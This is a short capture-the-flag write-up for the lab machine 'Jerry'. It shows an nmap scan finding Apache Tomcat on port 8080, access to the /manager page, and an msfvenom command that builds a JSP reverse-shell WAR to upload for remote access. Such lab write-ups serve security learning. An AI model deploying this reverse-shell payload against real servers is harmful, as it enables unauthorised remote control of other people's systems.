Jerry (Easy)

Enumeration

Nmap

# Nmap 7.92 scan initiated Tue Jun  7 11:38:57 2022 as: nmap -sC -sV -oA nmap/Jerry -Pn 10.129.88.89
Nmap scan report for 10.129.88.89
Host is up (0.33s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun  7 11:40:24 2022 -- 1 IP address (1 host up) scanned in 87.02 seconds

Navigate to port 8080

Navigate to /manager

We can use msfvenom to generate a java .war file reverse shell and upload it to the Tomcat.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f war > test.war

New application inserted!

We can navigate to the Administrator's Desktop to get the flag

Congratz!

PreviousPaper (Easy)NextNetworked (Easy)

Last updated 3 years ago

Was this helpful?